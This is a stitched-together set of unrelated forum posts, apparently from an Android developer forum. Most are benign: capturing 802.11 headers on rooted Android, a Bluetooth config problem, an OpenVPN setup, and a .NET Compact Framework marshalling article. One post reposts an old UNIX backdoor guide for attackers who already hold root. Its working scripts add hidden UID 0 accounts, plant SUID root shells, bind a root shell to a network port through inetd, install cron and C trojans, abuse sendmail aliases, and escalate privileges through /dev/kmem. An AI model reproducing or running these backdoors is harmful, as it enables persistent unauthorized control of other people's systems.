Hi all,
I've been digging around to try and gain the ability to access the WiFi stack from an Android device that is rooted. What I am interested in, is capturing the 802.11 radio headers. I've done a bunch of searching, and it seems like getting the card in to promiscuous/monitor mode is out of the question. I haven't been able to find anyone to do it. But, even not being in this mode I am wondering if it is possible to get 802.11 headers.
I've downloaded the android-wifi-tether project to get the tools it has pre-built and installed on the file system, such as iwconfig, and I've also installed tcpdump.
I cannot get the card into monitor mode, as was expected:
Code:
# ./iwconfig tiwlan0 mode monitor
Error for wireless request "Set Mode" (8B06) :
SET failed on device tiwlan0 ; Operation not supported on transport endpoint.
That's fine. But when I use tcpdump, it seems as though the lowest layer of information available is the Ethernet/IP information:
Code:
# /data/tcpdump -i tiwlan0 -L
tcpdump: WARNING: can't create rx ring on packet socket 3: 92-Protocol not available
Data link types (use option -y to set):
DOCSIS (DOCSIS) (printing not supported)
EN10MB (Ethernet)
So for example, if I tcpdump:
Code:
07:51:21.793444 IP 192.168.1.103.34528 > 64.233.169.193.443: Flags [S], seq 3412091441, win 5840, options [mss 1460,sackOK,TS[|tcp]>
07:51:22.096239 IP 64.233.169.193.443 > 192.168.1.103.34528: Flags [S.], seq 513767123, ack 3412091442, win 5672, options [mss 1430,sackOK,TS[|tcp]>
Has anyone been able to dig any lower in the networking stack?
Thanks!
George
OK, I've done a significant amount of digging, and luckily the TI wl1271 wireless driver is built as a kernel module (I'm using a Droid 1). the "dmesg" output provides some hints that the TIWLAN module is active and parsing incoming packets at the lower layer:
Code:
<6>[ 5940.231292] TIWLAN: 3835.067243: rx , ERROR: rxData_receivePacketFromWlan() : MLME returned error
The code for this function can be found here, and even better the low-level packet information (e.g., RSSI) is available in this function.:
Code:
/*
* Set rx attributes
*/
RxAttr.channel = pRxParams->channel;
RxAttr.packetInfo = pRxParams->flags;
RxAttr.ePacketType= pRxParams->packet_class_tag;
RxAttr.Rate = appRate;
RxAttr.Rssi = pRxParams->rx_level;
RxAttr.SNR = pRxParams->rx_snr;
RxAttr.status = pRxParams->status & RX_DESC_STATUS_MASK;
I'm also wondering whether or not it might be possible to drop the card in to promiscuous mode with some driver hacking. It appears to be possible through the RX filter, albeit maybe not supported by the actual firmware (that would suck):
Code:
#define RX_CFG_PROMISCUOUS 0x0008 /* promiscuous - receives all valid frames */
#define RX_CFG_BSSID 0x0020 /* receives frames from any BSSID */
#define RX_CFG_MAC 0x0010 /* receives frames destined to any MAC address */
#define RX_CFG_ENABLE_ONLY_MY_DEST_MAC 0x0010
I too want to capture WiFi packet headers on Android using tcpdump. I am using an HTC dream phone (Android 1.6, Wi-Fi (802.11b/g) using a Texas Instruments WL1251B chipset). The default TI driver filters the 802.11 packet headers while doing a packet capture on the device using tcpdump. Did you figure out a way to capture the 802.11 headers using the default TI driver?
Also, I was looking at installing a mac80211 based driver on an android device. I followed the instructions to create the kernel modules and loaded them up on the phone. But, I could not activate the WiFi interface after doing so (though I saw the "wlan0" interface indicating that the mac80211 driver was loaded).
So, I am stuck at this point. Can you provide some directions from here?
Thanks
Ashish
Hi everybody,
I'm developing on a Pandaboard ES. I compiled AOSP 4.0.4 and a kernel from scratch, everything working quite good so far.
As I need to connect some weird bt-devices I have to change the default bt-class.
This is what I get from hciconfig -a:
Code:
/ # hciconfig -a
hci0: Type: BR/EDR Bus: UART
BD Address: 1C:E2:XX:XX:XX:XX ACL MTU: 1021:4 SCO MTU: 180:4
UP RUNNING PSCAN
RX bytes:2148 acl:0 sco:0 events:92 errors:0
TX bytes:1472 acl:0 sco:0 commands:92 errors:0
Features: 0xff 0xfe 0x2d 0xfe 0xdb 0xff 0x7b 0x87
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy: RSWITCH HOLD SNIFF
Link mode: SLAVE ACCEPT
Name: 'BlueZ'
[COLOR="Red"]Class: 0x1a0000[/COLOR]
Service Classes: Networking, Capturing, Object Transfer
[COLOR="red"]Device Class: Miscellaneous, [/COLOR]
HCI Version: 4.0 (0x6) Revision: 0x0
LMP Version: 4.0 (0x6) Subversion: 0x1f22
Manufacturer: Texas Instruments Inc. (13)
By default there is no main.conf in /etc/bluetooth/. But I can find two different ones in the sources from where I'm compiling.
1: /external/bluetooth/bluez/src/main.conf
2: /system/bluetooth/data/main.conf
I modified one, pushed it to the pandaboard and rebooted, but the file is ignored. Neither the class nor the name change as expected.
Changing the class with hcitool works, but this is, of course, not permanent. (When changing the class I can connect my "weird" device without problems.)
Why is the file ignored? File owner and rights are the same as on my Nexus S. Here the file exists. (Unfortunately I can't check if its really parsed here, because it's my productive phone, so it is unrooted and stock 4.0.4)
Below you find the content of /etc/bluetooth and main.conf which I pushed to the pandaboard.
Code:
/ # ls -al /etc/bluetooth/
-r--r----- bluetooth bluetooth 1699 2012-05-11 10:31 audio.conf
-rw-r----- system system 1536 2012-05-11 10:31 auto_pairing.conf
-r--r--r-- net_bt net_bt 401 2012-05-11 10:31 blacklist.conf
-r--r----- bluetooth bluetooth 262 2012-05-11 10:31 input.conf
-r--r--r-- bluetooth bluetooth 2802 2012-06-25 09:44 main.conf
-r--r----- bluetooth bluetooth 120 2012-05-11 10:31 network.conf
PHP:
[General]
# List of plugins that should not be loaded on bluetoothd startup
#DisablePlugins = network,input
# Default adaper name
# %h - substituted for hostname
# %d - substituted for adapter id
Name = "Panda"
# Default device class. Only the major and minor device class bits are
# considered.
Class = 0x400210
# How long to stay in discoverable mode before going back to non-discoverable
# The value is in seconds. Default is 180, i.e. 3 minutes.
# 0 = disable timer, i.e. stay discoverable forever
DiscoverableTimeout = 120
# How long to stay in pairable mode before going back to non-discoverable
# The value is in seconds. Default is 0.
# 0 = disable timer, i.e. stay pairable forever
PairableTimeout = 0
# Use some other page timeout than the controller default one
# which is 16384 (10 seconds).
PageTimeout = 8192
# Discover scheduler interval used in Adapter.DiscoverDevices
# The value is in seconds. Defaults is 30.
DiscoverSchedulerInterval = 30
# What value should be assumed for the adapter Powered property when
# SetProperty(Powered, ...) hasn't been called yet. Defaults to true
InitiallyPowered = true
# Remember the previously stored Powered state when initializing adapters
RememberPowered = true
# Use vendor, product and version information for DID profile support.
# The values are separated by ":" and VID, PID and version.
DeviceID = android:generic:1.5
# Do reverse service discovery for previously unknown devices that connect to
# us. This option is really only needed for qualification since the BITE tester
# doesn't like us doing reverse SDP for some test cases (though there could in
# theory be other useful purposes for this too). Defaults to true.
ReverseServiceDiscovery = true
# Enable name resolving after inquiry. Set it to 'false' if you don't need
# remote devices name and want shorter discovery cycle. Defaults to 'true'.
NameResolving = true
# Enable runtime persistency of debug link keys. Default is false which
# makes debug link keys valid only for the duration of the connection
# that they were created for.
DebugKeys = false
# Enable Low Energy support if the dongle supports. Default is false.
# Enable/Disable interleave discovery and attribute server over LE.
EnableLE = false
# Enable the GATT Attribute Server. Default is false, because it is only
# useful for testing. Attribute server is not enabled over LE if EnableLE
# is false.
AttributeServer = false
# The link policy for connections. By default it's set to 0x000f which is
# a bitwise OR of role switch(0x0001), hold mode(0x0002), sniff mode(0x0004)
# and park state(0x0008) are all enabled. However, some devices have
# connection stability issue or fail to setup SCO when the link is in park
# state, which requires park state bit cleared.
DefaultLinkPolicy = 0x000f
bump
Nobody an idea?
Bumping this a last time as this topic is still not solved.
Any help would be great.
I also posted this on the OpenVPN forums but figured someone here may have experienced a similar problem or at least have ideas for what to do next.
My goal is to be able to connect my android phone via OpenVPN to my home network.
I started by installing OpenVPN 2.2.2
my config folder looks like this
Code:
ca.crt
dh1024.pem
server.crt
server.key
server.ovpn
My Server.ovpn contains.
Code:
# Suppose that you want to enable different
# firewall access policies for different groups
# of clients. There are two methods:
# (1) Run multiple OpenVPN daemons, one for each
# group, and firewall the TUN/TAP interface
# for each group/daemon appropriately.
# (2) (Advanced) Create a script to dynamically
# modify the firewall in response to access
# from different clients. See man
# page for more info on learn-address script.
;learn-address ./script
# If enabled, this directive will configure
# all clients to redirect their default
# network gateway through the VPN, causing
# all IP traffic such as web browsing and
# and DNS lookups to go through the VPN
# (The OpenVPN server machine may need to NAT
# or bridge the TUN/TAP interface to the internet
# in order for this to work properly).
;push "redirect-gateway def1 bypass-dhcp"
# Certain Windows-specific network settings
# can be pushed to clients, such as DNS
# or WINS server addresses. CAVEAT:
# The addresses below refer to the public
# DNS servers provided by opendns.com.
;push "dhcp-option DNS 208.67.222.222"
;push "dhcp-option DNS 208.67.220.220"
# Uncomment this directive to allow different
# clients to be able to "see" each other.
# By default, clients will only see the server.
# To force clients to only see the server, you
# will also need to appropriately firewall the
# server's TUN/TAP interface.
;client-to-client
# Uncomment this directive if multiple clients
# might connect with the same certificate/key
# files or common names. This is recommended
# only for testing purposes. For production use,
# each client should have its own certificate/key
# pair.
#
# IF YOU HAVE NOT GENERATED INDIVIDUAL
# CERTIFICATE/KEY PAIRS FOR EACH CLIENT,
# EACH HAVING ITS OWN UNIQUE "COMMON NAME",
# UNCOMMENT THIS LINE OUT.
;duplicate-cn
# The keepalive directive causes ping-like
# messages to be sent back and forth over
# the link so that each side knows when
# the other side has gone down.
# Ping every 10 seconds, assume that remote
# peer is down if no ping received during
# a 120 second time period.
keepalive 10 120
# For extra security beyond that provided
# by SSL/TLS, create an "HMAC firewall"
# to help block DoS attacks and UDP port flooding.
#
# Generate with:
# openvpn --genkey --secret ta.key
#
# The server and each client must have
# a copy of this key.
# The second parameter should be '0'
# on the server and '1' on the clients.
;tls-auth ta.key 0 # This file is secret
# Select a cryptographic cipher.
# This config item must be copied to
# the client config file as well.
;cipher BF-CBC # Blowfish (default)
;cipher AES-128-CBC # AES
;cipher DES-EDE3-CBC # Triple-DES
# Enable compression on the VPN link.
# If you enable it here, you must also
# enable it in the client config file.
comp-lzo
# The maximum number of concurrently connected
# clients we want to allow.
;max-clients 100
# It's a good idea to reduce the OpenVPN
# daemon's privileges after initialization.
#
# You can uncomment this out on
# non-Windows systems.
;user nobody
;group nobody
# The persist options will try to avoid
# accessing certain resources on restart
# that may no longer be accessible because
# of the privilege downgrade.
persist-key
persist-tun
# Output a short status file showing
# current connections, truncated
# and rewritten every minute.
status openvpn-status.log
# By default, log messages will go to the syslog (or
# on Windows, if running as a service, they will go to
# the "\Program Files\OpenVPN\log" directory).
# Use log or log-append to override this default.
# "log" will truncate the log file on OpenVPN startup,
# while "log-append" will append to it. Use one
# or the other (but not both).
;log openvpn.log
;log-append openvpn.log
# Set the appropriate level of log
# file verbosity.
#
# 0 is silent, except for fatal errors
# 4 is reasonable for general usage
# 5 and 6 can help to debug connection problems
# 9 is extremely verbose
verb 6
# Silence repeating messages. At most 20
# sequential messages of the same message
# category will be output to the log.
;mute 20
I used this to generate a .p12 for my phone.
Code:
openssl.exe pkcs12 -export -in phone.crt -inkey phone.key -certfile ca.crt -name phone -out phone.p12
My port is forwarded correctly and software firewall is disabled.
This is what I get in the log.
pastebin: gPCBwWE1
And then the connection reset by peer will simply repeat.
I have tried tcp, different ports, recreating keys and directly connecting my comp to the internet.
Any suggestions on where to go from here would be helpful.
I have tried Googling quite a bit but there isn't much out there.
Thanks.
I thought this was interesting paper written by an unknown author
You've been at it for all night. Trying all the exploits you can think of. The system seems tight. The system looks tight.
The system *is* tight. You've tried everything. Default passwds, guessable passwds, NIS weaknesses, NFS holes, incorrect
permissions, race conditions, SUID exploits, Sendmail bugs, and so on... Nothing.After seeming endless you've managed to steal root. Now what? How do you hold onto this precious super-user
privilege you have worked so hard to achieve....?
This list is BY NO MEANS comprehensive. There are as many ways to leave backdoors into a UNIX computer as there are
ways into one.
Beforehand
Know the location of critical system files. This should be obvious (If you can't list any of the top of your head, stop reading
now, get a book on UNIX, read it, then come back to me...). Familiarity with passwd file formats (including general 7 field
format, system specific naming conventions, shadowing mechanisms, etc...). Know vi. Many systems will not have those
robust, user-friendly editors such as Pico and Emacs. Vi is also quite useful for needing to quickly seach and edit a large file. If
you are connecting remotely (via dial-up/telnet/rlogin/whatver) it's always nice to have a robust terminal program that has a
nice, FAT scrollback buffer. This will come in handy if you want to cut and paste code, rc files, shell scripts, etc...
The permenance of these backdoors will depend completely on the technical saavy of the administrator. The experienced and
skilled administrator will be wise to many (if not all) of these backdoors. But, if you have managed to steal root, it is likely the
admin isn't as skilled (or up to date on bug reports) as she should be, and many of these doors may be in place for some time
to come. One major thing to be aware of, is the fact that if you can cover you tracks during the initial break-in, no one will be
looking for back doors.
The JDevil Overt
[1] Add a UID 0 account to the passwd file. This is probably the most obvious and quickly discovered method of rentry. It
flies a red flag to the admin, saying "WE'RE UNDER ATTACK!!!". If you must do this, my advice is DO NOT simply
prepend or append it. Anyone causally examining the passwd file will see this. So, why not stick it in the middle...
#!/bin/csh
# Inserts a UID 0 account into the middle of the passwd file.
# There is likely a way to do this in 1/2 a line of AWK or SED. Oh well.
# [email protected]
set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
echo passwd file has $linecount[1] lines.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
echo Creating two files, $linecount[1] lines each \(or approximately that\).
split -$linecount[1] ./temppass # passwd string optional
echo "jdevil::0:0:jdevil:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...
NEVER, EVER, change the root password. The reasons are obvious.
[2] In a similar vein, enable a disabled account as UID 0, such as Sync. Or, perhaps, an account somwhere buried deep in the
passwd file has been abandoned, and disabled by the sysadmin. Change her UID to 0 (and remove the '*' from the second
field).
[3] Leave an SUID root shell in /tmp.
#!/bin/sh
# Everyone's favorite...
cp /bin/csh /tmp/.JDEVIL # Don't name it that...
chmod 4755 /tmp/.JDEVIL
Many systems run cron jobs to clean /tmp nightly. Most systems clean /tmp upon a reboot. Many systems have /tmp mounted
to disallow SUID programs from executing. You can change all of these, but if the filesystem starts filling up, people may
notice...but, hey, this *is* the overt section....). I will not detail the changes neccessary because they can be quite system
specific. Check out /var/spool/cron/crontabs/root and /etc/fstab.
The JDEVIL Veiled
[4] The super-server configuration file is not the first place a sysadmin will look, so why not put one there? First, some
background info: The Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP ports and spawns the
appropriate program (usally a server) when a connection request arrives. The format of the /etc/inetd.conf file is simple. Typical
lines look like this:
(1) (2) (3) (4) (5) (6) (7)
ftp stream tcp nowait root /usr/etc/ftpd ftpd
talk dgram udp wait root /usr/etc/ntalkd ntalkd
Field (1) is the daemon name that should appear in /etc/services. This tells inetd what to look for in /etc/services to determine
which port it should associate the program name with. (2) tells inetd which type of socket connection the daemon will expect.
TCP uses streams, and UDP uses datagrams. Field (3) is the protocol field which is either of the two transport protocols, TCP
or UDP. Field (4) specifies whether or not the daemon is iterative or concurrent. A 'wait' flag indicates that the server will
process a connection and make all subsequent connections wait. 'Nowait' means the server will accept a connection, spawn a
child process to handle the connection, and then go back to sleep, waiting for further connections. Field (5) is the user (or more
inportantly, the UID) that the daemon is run as. (6) is the program to run when a connection arrives, and (7) is the actual
command (and optional arguments). If the program is trivial (usally requiring no user interaction) inetd may handle it internally.
This is done with an 'internal' flag in fields (6) and (7).
So, to install a handy backdoor, choose a service that is not used often, and replace the daemon that would normally handle it
with something else. A program that creates an SUID root shell, a program that adds a root account for you in the /etc/passwd
file, etc...
For the insinuation-impaired, try this:
Open the /etc/inetd.conf in an available editor. Find the line that reads:
daytime stream tcp nowait root internal
and change it to:
daytime stream tcp nowait /bin/sh sh -i.
You now need to restart /etc/inetd so it will reread the config file. It is up to you how you want to do this. You can kill and
restart the process, (kill -9 , /usr/sbin/inetd or /usr/etc/inetd) which will interuppt ALL network connections (so it is a good idea
to do this off peak hours).
[5] An option to compromising a well known service would be to install a new one, that runs a program of your choice. One
simple solution is to set up a shell the runs similar to the above backdoor. You need to make sure the entry appears in
/etc/services as well as in /etc/inetd.conf. The format of the /etc/services file is simple:
(1) (2)/(3) (4)
smtp 25/tcp mail
Field (1) is the service, field (2) is the port number, (3) is the protocol type the service expects, and (4) is the common name
associated with the service. For instance, add this line to /etc/services:
jdevil 22/tcp jdevil
and this line to /etc/inetd.conf:
jdevil stream tcp nowait /bin/sh sh -i
Restart inetd as before.
Note: Potentially, these are a VERY powerful backdoors. They not only offer local rentry from any account on the system,
they offer rentry from *any* account on *any* computer on the Internet.
[6] Cron-based trojan I. Cron is a wonderful system administration tool. It is also a wonderful tool for backdoors, since root's
crontab will, well, run as root... Again, depending on the level of experience of the sysadmin (and the implementation), this
backdoor may or may not last. /var/spool/cron/crontabs/root is where root's list for crontabs is usally located. Here, you have
several options. I will list a only few, as cron-based backdoors are only limited by your imagination. Cron is the clock daemon.
It is a tool for automatically executing commands at specified dates and times. Crontab is the command used to add, remove,
or view your crontab entries. It is just as easy to manually edit the /var/spool/crontab/root file as it is to use crontab. A crontab
entry has six fields:
(1) (2) (3) (4) (5) (6)
0 0 * * 1 /usr/bin/updatedb
Fields (1)-(5) are as follows: minute (0-59), hour (0-23), day of the month (1-31) month of the year (1-12), day of the week
(0-6). Field (6) is the command (or shell script) to execute. The above shell script is executed on Mondays. To exploit cron,
simply add an entry into /var/spool/crontab/root. For example: You can have a cronjob that will run daily and look in the
/etc/passwd file for the UID 0 account we previously added, and add him if he is missing, or do nothing otherwise (it may not
be a bad idea to actually *insert* this shell code into an already installed crontab entry shell script, to further obfuscate your
shady intentions). Add this line to /var/spool/crontab/root:
0 0 * * * /usr/bin/trojancode
This is the shell script:
#!/bin/csh
# Is our jdevil still on the system? Let's make sure he is.
#[email protected]
set JDEVILflag = (`grep jdevil /etc/passwd`)
if($#JDEVILflag == 0) then # Is he there?
set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
split -$linecount[1] ./temppass # passwd string optional
echo "jdevil::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...
else
endif
[7] Cron-based trojan II. This one was brought to my attention by our very own Mr. Zippy. For this, you need a copy of the
/etc/passwd file hidden somewhere. In this hidden passwd file (call it /var/spool/mail/.sneaky) we have but one entry, a root
account with a passwd of your choosing. We run a cronjob that will, every morning at 2:30am (or every other morning), save a
copy of the real /etc/passwd file, and install this trojan one as the real /etc/passwd file for one minute (synchronize swatches!).
Any normal user or process trying to login or access the /etc/passwd file would get an error, but one minute later, everything
would be ok. Add this line to root's crontab file:
29 2 * * * /bin/usr/_passwd
make sure this exists:
#echo "root:1234567890123:0:0perator:/:/bin/csh" > /var/spool/mail/.passwd
and this is the simple shell script:
#!/bin/csh
# Install trojan /etc/passwd file for one minute
#[email protected]
cp /etc/passwd /etc/.temppass
cp /var/spool/mail/passwd /etc/passwd
sleep 60
mv /etc/.temppass /etc/passwd
[8] Compiled code trojan. Simple idea. Instead of a shell script, have some nice C code to obfuscate the effects. Here it is.
Make sure it runs as root. Name it something innocous. Hide it well.
/* A little trojan to create an SUID root shell, if the proper argument is
given. C code, rather than shell to hide obvious it's effects. */
/* [email protected] */
#include
#define KEYWORD "industry3"
#define BUFFERSIZE 10
int main(argc, argv)
int argc;
char *argv[];{
int i=0;
if(argv[1]){ /* we've got an argument, is it the keyword? */
if(!(strcmp(KEYWORD,argv[1]))){
/* This is the trojan part. */
system("cp /bin/csh /bin/.swp121");
system("chown root /bin/.swp121");
system("chmod 4755 /bin/.swp121");
}
}
/* Put your possibly system specific trojan
messages here */
/* Let's look like we're doing something... */
printf("Sychronizing bitmap image records.");
/* system("ls -alR / >& /dev/null > /dev/null&"); */
for(;i<10;i++){
fprintf(stderr,".");
sleep(1);
}
printf("\nDone.\n");
return(0);
} /* End main */
[9] The sendmail aliases file. The sendmail aliases file allows for mail sent to a particular username to either expand to several
users, or perhaps pipe the output to a program. Most well known of these is the uudecode alias trojan. Simply add the line:
"decode: "|/usr/bin/uudecode"
to the /etc/aliases file. Usally, you would then create a uuencoded .rhosts file with the full pathname embedded.
#! /bin/csh
# Create our .rhosts file. Note this will output to stdout.
echo "+ +" > tmpfile
/usr/bin/uuencode tmpfile /root/.rhosts
Next telnet to the desired site, port 25. Simply fakemail to decode and use as the subject body, the uuencoded version of the
.rhosts file. For a one liner (not faked, however) do this:
%echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail [email protected]
You can be as creative as you wish in this case. You can setup an alias that, when mailed to, will run a program of your
choosing. Many of the previous scripts and methods can be employed here.
The JDEVIL Covert
[10] Trojan code in common programs. This is a rather sneaky method that is really only detectable by programs such tripwire.
The idea is simple: insert trojan code in the source of a commonly used program. Some of most useful programs to us in this
case are su, login and passwd because they already run SUID root, and need no permission modification. Below are some
general examples of what you would want to do, after obtaining the correct sourcecode for the particular flavor of UNIX you
are backdooring. (Note: This may not always be possible, as some UNIX vendors are not so generous with thier sourcecode.)
Since the code is very lengthy and different for many flavors, I will just include basic psuedo-code:
get input;
if input is special hardcoded flag, spawn evil trojan;
else if input is valid, continue;
else quit with error;
...
Not complex or difficult. Trojans of this nature can be done in less than 10 lines of additional code.
The JDEVIL Esoteric
[11] /dev/kmem exploit. It represents the virtual of the system. Since the kernel keeps it's parameters in memory, it is possible
to modify the memory of the machine to change the UID of your processes. To do so requires that /dev/kmem have read/write
permission. The following steps are executed: Open the /dev/kmem device, seek to your page in memory, overwrite the UID of
your current process, then spawn a csh, which will inherit this UID. The following program does just that.
/* If /kmem is is readable and writable, this program will change the user's
UID and GID to 0. */
/* This code originally appeared in "UNIX security: A practical tutorial"
with some modifications by [email protected] */
#include
#include
#include
#include
#include
#include
#include
#define KEYWORD "nomenclature1"
struct user userpage;
long address(), userlocation;
int main(argc, argv, envp)
int argc;
char *argv[], *envp[];{
int count, fd;
long where, lseek();
if(argv[1]){ /* we've got an argument, is it the keyword? */
if(!(strcmp(KEYWORD,argv[1]))){
fd=(open("/dev/kmem",O_RDWR);
if(fd<0){
printf("Cannot read or write to /dev/kmem\n");
perror(argv);
exit(10);
}
userlocation=address();
where=(lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n");
perror(argv);
exit(20);
}
count=read(fd,&userpage,sizeof(struct user));
if(count!=sizeof(struct user)){
printf("Cannot read user page\n");
perror(argv);
exit(30);
}
printf("Current UID: %d\n",userpage.u_ruid);
printf("Current GID: %d\n",userpage.g_ruid);
userpage.u_ruid=0;
userpage.u_rgid=0;
where=lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n");
perror(argv);
exit(40);
}
write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage));
execle("/bin/csh","/bin/csh","-i",(char *)0, envp);
}
}
} /* End main */
#include
#include
#include
#define LNULL ((LDFILE *)0)
long address(){
LDFILE *object;
SYMENT symbol;
long idx=0;
object=ldopen("/unix",LNULL);
if(!object){
fprintf(stderr,"Cannot open /unix.\n");
exit(50);
}
for(;ldtbread(object,idx,&symbol)==SUCCESS;idx++){
if(!strcmp("_u",ldgetname(object,&symbol))){
fprintf(stdout,"User page is at 0x%8.8x\n",symbol.n_value);
ldclose(object);
return(symbol.n_value);
}
}
fprintf(stderr,"Cannot read symbol table in /unix.\n");
exit(60);
}
[12] Since the previous code requires /dev/kmem to be world accessable, and this is not likely a natural event, we need to take
care of this. My advice is to write a shell script similar to the one in [7] that will change the permissions on /dev/kmem for a
discrete amount of time (say 5 minutes) and then restore the original permissions. You can add this source to the source in [7]:
chmod 666 /dev/kmem
sleep 300 # Nap for 5 minutes
chmod 600 /dev/kmem # Or whatever it was before
JDevil
Happy Reading
There are some small spacing errors in code but you the idea
Author: Apriorit (Device Team)
Permanent link: apriorit(dot)com/our-company/dev-blog/62-marshalling-data-in-cf
In many situations when we create applications for different embedded systems or mobile platforms we can’t develop all parts of the product using managed code only.
For example we need several modules written in native language which perform some low level operations or we already have these libraries written on C++. So we have to use more than one programming language in our product and also use data marshaling in it.
In this article we will review some aspects of using data types and ways of using them during marshalling data to and from unmanaged code.
Making your interop calls more efficient
Marshaling is the act of taking data from one environment to another. In the context of .NET marshalling refers to transferring data from the app-domain you are in to somewhere else, outside.
You should remember that such Platform Invoke calls are slower than direct native calls and than regular managed calls. The speed depends on types marshaled between managed and native code, but nevertheless you should avoid using Platform Invoke calls if you have a chance to do this. Also it is recommended to use calls with some amount of transferred data than several “small” Platform Invoke calls.
Bitable types
It is recommended to use simple data types (int, byte, boolean, characters and strings). It makes the call more efficient and helps to avoid any convertions and copying. These blittable types have identical representation in both managed and unmanaged memory. But you should remember that in Compact Framework during marshaling boolean type is represented as 1-byte integer value (instead of 4-byte integer value in the full .NET Framework), character type (char) is always represented as 2-bytes Unicode character and String type is always treated as a Unicode array (in full .NET Framework it may be treated as a Unicode or ANSI array, or a BSTR).
Method Inlining
The JIT compiler can inline some methods in order to make the calls more efficient. You can not force a method to be inlined by the compiler, but you can make it NOT to be inlined. In order to avoid inlining you can:
• make the method virtual;
• add branching to the method’s body;
• define local variables in the method;
• use 2-bit floating point arguments (or return value).
Disabling method inlining can help to detect a problem during Platform Invoke calls.
Sequential layout
In the Compact Framework all structures and classes always have sequential layout (the managed value type has the same memory layout as the unmanaged structure). This behavior can be specified by setting attribute LayoutKind.Sequential. You don’t need to specify this attribute in Compact Framework, but if you use these pieces of code in both full .NET Framework and Compact Framework you have to set it to avoid different behavior on two platforms.
The following sample shows how to send some pointers from C# code for storing them in the native module.
Code C#:
Code:
[StructLayout(LayoutKind.Sequential)]
public class BasePointers // you can use the struct too
{
public IntPtr pointer1;
public IntPtr pointer2;
}
[DllImport("NativeDLL.dll", CallingConvention = CallingConvention.Winapi)]
// Cdecl
public static extern int TransferStruct(BasePointers pointers);
Code C++:
Code:
struct BasePointers
{
unsigned int pointer1;
unsigned int pointer2;
}
extern "C" __declspec(dllexport) int CDECL TransferArray(BasePointers*
pointers);
One Calling Convention
The Calling Convention determines the order in which parameters are passed to the function, and who is responsible for the stack cleaning. The .NET Compact Framework supports only the Winapi value (Cdecl on this platform) of Calling Convention. It defines the calling convention for C and C++ (instead of the full .NET Framework which supports three different calling conventions). To avoid crashes of your application you should make sure that your calling conventions in both managed and native declarations are same.
If you specify the attribute to preserve signature of functions ([PreserveSig]) then the returned value will contain 32-bit HRESULT value that will give you more data to analyze errors during the native function execution. The Calling Convention can be specified by adding the attribute CallingConvention to the declaration of your function. As it was mentioned the .NET Compact Framework supports only “Winapi” Calling Convention that corresponds to Cdecl:
Code C#:
Code:
[UnmanagedFunctionPointer(CallingConvention.Winapi)]
public delegate int ProgressEventHandler(int progressValue);
Code C++:
Code:
typedef void (CDECL *ProgressEventHandler)(int progressValue);
Data Alignment
In some situations we need to transfer data between the managed and unmanaged code in the structures. As it’s written above all structures have sequential layout in the Compact Framework, but you should remember about representation of structs in the managed in unmanaged code. The way of packing structures depends on a platform and on a way how the members of structure are aligned. On ARM platform this value for alignment is four (all values in structures are aligned to 4 bytes).
Code:
typedef struct OurStruct
{
unsigned char valueChar;
usingned int valueInt;
} ourStruct_;
This structure could be perfectly acceptable in desktop code, but if you use such structure on the Windows Mobile platform then you might receive valueInt at the offset 4. If you use such structures in both desktop and device's side code you have to use them carefully during marshaling.
During marshaling data you might receive such errors as “Datatype misalignment” (0x80000002) or “Access violation” (0x80000005). It indicates that you are using wrong pointers or try to access to the wrong offset of data. For example, you transfer array of bytes from C# code to the native module and define you functions as:
C# code:
Code:
[DllImport("NativeDLL.dll", CallingConvention = CallingConvention.Winapi)]
// Cdecl
public static extern int TransferArray(IntPtr src, int srcSize);
C++ Native Module code:
extern "C" __declspec(dllexport) int CDECL TransferArray(byte* srcArr,
int srcSize);
If you try to use the pointer “srcArr” as the pointer on integer (int*) and then try to use the corresponding value you will receive an error :
Code:
int value = *(int*)srcArr; // Datatype misalignment
The simple way to avoid this problem is to change declaration of C++ function and change the pointer on array of bytes to the pointer on array of integer and use it without any problems:
Code:
extern "C" __declspec(dllexport) int CDECL TransferArray(int* srcArr,
int srcSize);
Marshal class
You can use methods in the class Marshal to manually convert managed objects and perform conversions between IntPtrs. These methods are PtrToStructure, GetComInterfaceForObject, PtrToStringBSTR, GetFunctionPointerForDelegate and others. It allows you to control marshaling. These methods are also useful for debugging issues with marshaling parameters where the runtime is not able to convert a particular argument.
You cannot pass delegate directly to the native module as parameter of you function because the .NET Compact Framework does not support marshaling of delegates. Instead you should use method Marshal.GetFunctionPointerForDelegate for getting function pointer which you can pass to the native code and call it.
Code:
Code:
class MainClass
{
[UnmanagedFunctionPointer(CallingConvention.Winapi)]
public delegate int ProgressEventHandler(int progressValue);
...
void OnProgressChanged(int progressValue)
{
...
}
…
…
[DllImport("NativeDLL.dll", CallingConvention = CallingConvention.Winapi)]
// Cdecl
public static extern int SetCallbackFunction(IntPtr functionPointer);
}
// Passing function pointer
Delegate d = new ProgressEventHandler(OnProgressChanged);
IntPtr progressChanged = Marshal.GetFunctionPointerForDelegate(d);
int result = SetCallbackFunction(progressChanged);
But you should be aware of Garbage Collector (GC) in such situation. The GC might collect you delegates and your function pointers will become invalid. It may happen when you passed the function pointer to the native code as callback method in order to call it later - GC might think that there are no references to it in the managed code. To avoid this situation you should keep reference to this delegate. For example, you can store it in the classes variable or create some delegates pool, in which you can keep references to the several delegates.
GCHandle
Since we're passing a pointer to some data we need to allocate memory for that data and make sure that the GC will not remove that memory. One of the possible ways to manage this situation is to use GCHandle.
If you want to pass some class (or array of bytes) to the unmanaged code and you need to pin memory for the proper work with it in the unmanaged code you can write:
Code:
class SampleClass
{
...
}
SampleClass classSample = new SampleClass();
GCHandle classHandle = GCHandle.Alloc(classSample, GCHandleType.Pinned);
